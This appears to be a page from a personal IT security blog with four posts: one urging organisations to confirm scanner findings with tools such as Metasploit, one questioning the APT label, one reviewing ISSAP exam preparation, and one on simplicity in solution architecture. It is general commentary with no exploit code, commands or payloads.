Exploit vulnerabilities rather than just report on ‘hypothetical’ issues

While doing some general reading recently I came across an article entitled “Why aren’t you using Metasploit to expose Windows vulnerabilities?”.  This reminded me of something I have discussed with people a few times, the benefits of actually proving and demonstrating how vulnerabilities can be exploited rather than just relying on metrics from scanners..

Don’t get me wrong, the use of vulnerability / patch scanners are incredibly useful for providing an overall view of the status of an environment;

– Are patches being deployed consistently across the environment in a timely manner?

– Are rules around password complexity, who is in the administrators group, machines and users are located in the correct places in the LDAP database etc. being obeyed?

– Are software and O/S versions and types in line with the requirements / tech stack?

– etc..

The output from these scanners is also useful and extensively used in providing compliance / regulatory type report data confirming that an environment is ‘correctly’ maintained.

What these scans fall short in two main areas;

1. They do not provide a real picture of the actual risk any of the identified vulnerabilities pose to your organisation in your configuration with your polices and rules applied.

2. Due to point 1 they may either not create enough realisation of the risks for senior management to put enough priority / emphasis on remediating them, or they may cause far too much fear due to the many vulnerabilities identified that may or may not be exploitable.

In order to provide a quantitate demonstration of how easy (or difficult) it is to exploit identified vulnerabilities, and also demonstrate to management how these reported vulnerabilities actually be exploited, using tools such as Core Impact, Canvas or Metasploit in addition to just scanning for vulnerabilities is key.

Tools like Canvas and Core Impact are commercial offerings with relatively high price tags, Metasploit is however open source and free to use in both Windows and *nix environments. It even has a gui!  So there is no excuse for not actually testing some key vulnerabilities identified by your scans, then demonstrating the results to senior management and even other IT staff to increase awareness.

Metasploit can be found here;

http://www.metasploit.com/

Where it can be downloaded for free.  Should you wish to contribute to it’s success there are also paid for versions.

The key message here is don’t stop using the standard patch / vulnerability scans as these are key to providing a picture of the entire environment and providing assurance of compliance to policies.  However these should be supplemented with actually exploiting some key vulnerabilities to provide evidence of the actual risk in you environment rather than just the usual ‘arbitrary code execution’ or similar statement related to the potential vulnerability.  This will put much more weight behind the your arguments for improving security.

K

Advertisements

APT – new threat or just a new name? And just what does it mean?

The term Advanced Persistent Threat (APT) has become the de facto term for criminals, organisations and governments spending considerable time, effort and expertise attempting to gain access to another organisations data.

Now this is clearly not a new phenomenon as people with the resources to do so have always put time into getting the information they want using technical and non-technical techniques including;

– Dumpster diving

– Social engineering (over the phone, and in person on site)

– Viruses / Trojans / Worms delivered via email / usb / floppy disk / CD etc.

– Phishing / spear-phishing (or what ever targeted emails / mails used to be called)

etc. etc.

The question is, has this problem suddenly become much larger and more of a concern, or is the new name and much of the news there to create fear and market security tools / services?

I am completely in favour of people having a common language, so giving a simple and agreed term to “criminals, organisations and governments spending considerable time, effort and expertise attempting to gain access to another organisations data.” is definitely a good thing.  However this needs to be used with caution, so that the accusation of spreading unnecessary fear and uncertainty cannot be levied against the security industry.

For example how many of the attacks that are reported to have been launched from China by the Chinese government were actually launched from botnets in China enabled by the fact that users in the country have amongst the highest levels of unpatched machines in the world?  I don’t know the answer but while reading for this article I found conflicting thoughts and statements on this topic.

There is clearly a need for clarity and openness, everyone in the security industry, and increasingly people not in the industry, are aware that there are many risks out there especially to machines without AV, and not kept patched up to date.  The risk does however need to be fairly and realistically reported.

If a company is compromised, it is currently much less damaging to report it as an APT attack rather than owning up to some unpatched machines or a misconfigured firewall, or someone clicking on a phishing mail while logged in with administrative privileges etc.

Equally though when there is clear evidence of APT, this should be clearly reported, especially if in doing so the techniques used can be revealed to help protect other potential victims.  Should government agents be clearly implicated, this should be reported as governments are supposed to be beholden to international laws and not behave in a criminal manner.  I guess the same could and should be said of individuals and criminal organisations!

In short, clearly agreed universal terminology is a good thing to aid understanding and communication even if it is not describing something new, but clear and open reporting of threats is key if people are to make informed and correct decisions about the real risks and how much time and expense should go into mitigating them vs. other threats and business needs.

Future posts will cover exactly what APT is in more detail, and also ask is the cloud something new?

ISSAP – Information Systems Security Architecture Professional

So, I recently received confirmation from the ISC2 (International Information Systems Security Certification Consortium) that I passed the ISSAP exam.   This is a secure architecture concentration in addition to the CISSP (Certified Information Systems Security Professional) certification.

While I believe this should be a worthwhile addition to my CISSP and of course my CV, while also helping progress my current role, I felt I should write a post about my preparation for the exam.

As with the CISSP (Certified Information Systems Security Professional) the best way to be prepared is to have a solid grounding in the subject matter – e.g. IT security and technical / solutions architecture.  Indeed several years of industry experience is a prerequisite for obtaining these certifications.

Also as with the CISSP I chose to cover off the bulk of the revision by using the ISC2 recommended course text.  With the CISSP I used the well regarded Shon Harris ‘CISSP all in one guide’ that was well written and very comprehensive.

For the ISSAP I used the ISC2 Official study guide to the CISSP-ISSAP.  Currently this is the only book specifically for the ISSAP exam that claims to cover all aspects of the exam.  Personally I found this book to be very badly written and hard to read.  The first chapter must have used the phrase ‘Confidentiality Integrity Availability’ in almost every sentence, yes we all know that CIA is important and what we are aiming for but there is no need to repeat it so often.

Other sections of the book only skimmed over areas that were quite heavily covered in the exam.

In short if you did not already have a very solid grounding and experience in the areas covered by the exam, this official guide would not be anywhere near enough to pass the exam.  Obviously the ISC2 may argue that you are supposed to have industry experience, but this does not necessarily include all the areas covered in the exam such as specific components of the common body of knowledge or other specific standards.

If you are a CISSP involved in designing secure architectures then this certainly seems like a worthwhile certification to go for.  I would advise doing some supplementary reading covering the Common Body of Knowledge and something like ‘Enterprise Security Architecture’ along with of course a solid background in both security and architecture.

As an aside I am a firm believer that study and / or involvement in IT related work such as creating white papers, contributing to open source etc. is a great way to not only improve your skills and knowledge, but also essential to show current and future employers that you are genuinely passionate about what you do rather than it just being a job.

K

Simplicity

In preparation for doing the Enterprise and Solution Architecture course and exam from the Chartered Institute for IT I have started reading the book ‘Simple Architectures for Complex Enterprises’ by Roger Sessions from Microsoft press.

While this is primarily a book focused on solution and enterprise architecture, the main point it focuses on is the often overlooked one of simplicity.  The basic premise is that the most simple solution that meets the requirements is the best solution.

The vast majority of IT projects, even those that appear relatively straight forward run over time or over budget, or both.  This is despite rigorous project processes (e.g. SDLC), and well understood architectural frameworks (e.g. Zachman, TOGAF).

The reason for this is that none of the project processes or architectural frameworks directly address complexity.  They do provide much needed rigour around how projects are run, and ensure that architects and the business can talk the same language via the use of agreed frameworks, both of which add great value, but neither of which prevents unnecessary complexity from creeping into solutions.

In addition to both increased cost and time to delivery overly complex solutions are much harder to;

Maintain – which component is causing the issue when trouble shooting? Will patching one part impact others?

Secure – Simple solutions are easy to test and make secure from the outset, complex solutions are likely insecure from the outset and near impossible to fully understand and secure further down the line.

A further post will follow covering some of the techniques outlined in the book around understanding complexity and eliminating it from solutions to even complex problems.

In the mean time, keep it simple and remember just because your business or the problem you are trying to solve is complex that does not mean the solution needs to be complicated!

K